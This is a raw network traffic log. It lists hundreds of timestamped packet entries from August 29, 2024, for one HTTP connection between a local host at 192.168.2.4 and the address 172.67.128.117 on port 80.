                                  Aug 29, 2024 23:42:08.729598045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729609966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729620934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729630947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729641914 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729654074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729665995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729681015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729684114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729707956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729721069 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729722023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729764938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729767084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729779959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729806900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729810953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729820013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729850054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729933023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729943991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729954958 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729964018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.729981899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.729993105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730020046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730303049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730365038 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730386972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730397940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730426073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730428934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730437994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730443001 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730449915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730460882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730465889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730479956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730498075 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730501890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730514050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730525017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730535984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730545998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730547905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730561018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730566978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730595112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730705976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730716944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730755091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730794907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730806112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730815887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730838060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730849981 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730921030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730931997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730942011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.730966091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.730989933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.814894915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814919949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814935923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814946890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814956903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814968109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814976931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.814990044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815061092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815061092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815061092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815061092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815061092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815280914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815299034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815308094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815321922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815332890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815352917 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815422058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815454960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815469027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815469980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815495014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815496922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815505981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815509081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815516949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815536976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815548897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815557957 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815784931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815793037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815824986 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815835953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815888882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815928936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815937042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815947056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.815973043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.815984964 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816000938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816011906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816020966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816030025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816042900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816047907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816055059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816063881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816082001 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816106081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816113949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816123962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816133022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816152096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816168070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816198111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816207886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816251993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816262007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816272974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816298962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816314936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816338062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816390991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816400051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816406012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816410065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816421032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816430092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816433907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816453934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816478014 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816519976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816562891 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816586018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816601038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816629887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816647053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816662073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816672087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816685915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816703081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816706896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.816721916 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816730022 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.816747904 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817147017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817157984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817168951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817187071 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817197084 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817223072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817236900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817246914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817256927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817269087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817271948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817280054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817291975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817296028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817306042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817331076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817379951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817393064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817404985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817414999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817424059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817424059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817450047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817472935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817533016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817543983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817549944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817554951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817576885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817595959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817614079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817625999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817631006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817637920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817662954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817677975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817776918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817787886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817794085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817801952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817812920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817823887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817826986 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817833900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817856073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817867041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817892075 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817939997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817950964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817977905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.817982912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.817992926 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818021059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818053007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818063021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818068981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818073988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818094015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818111897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818172932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818182945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818211079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818236113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818300009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818309069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818317890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818344116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818351030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818361044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818368912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818372011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818387985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818408966 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818419933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818468094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818485022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818511963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818526983 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818530083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818541050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818572998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818587065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818603039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818617105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818628073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818639040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818653107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818661928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818669081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818672895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818697929 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818711042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.818984985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.818995953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819005013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819026947 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819053888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819147110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819156885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819165945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819180965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819190979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819204092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819228888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819256067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819267035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819295883 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819320917 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819343090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819353104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819363117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819374084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819382906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819389105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819394112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819412947 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819412947 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819433928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819444895 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819475889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819483042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819493055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819526911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819544077 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819619894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819632053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819642067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819653034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819664955 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819678068 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819709063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.819761038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.819802999 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.904654980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.904681921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.904692888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.904752016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.904764891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.904767036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.904777050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.904793024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.904798985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.904818058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.904840946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905297995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905313969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905324936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905339956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905358076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905359030 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905371904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905383110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905390978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905395031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905402899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905431032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905455112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905674934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905715942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905740023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905751944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905781984 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905791998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905811071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905822039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905832052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905843019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.905853987 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905860901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.905891895 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906440973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906454086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906462908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906493902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906518936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906572104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906596899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906608105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906614065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906618118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906639099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906644106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906651974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906655073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906665087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906676054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906680107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906688929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906703949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906708002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906721115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906728029 CEST4973080192.168.2.4172.67.128.117
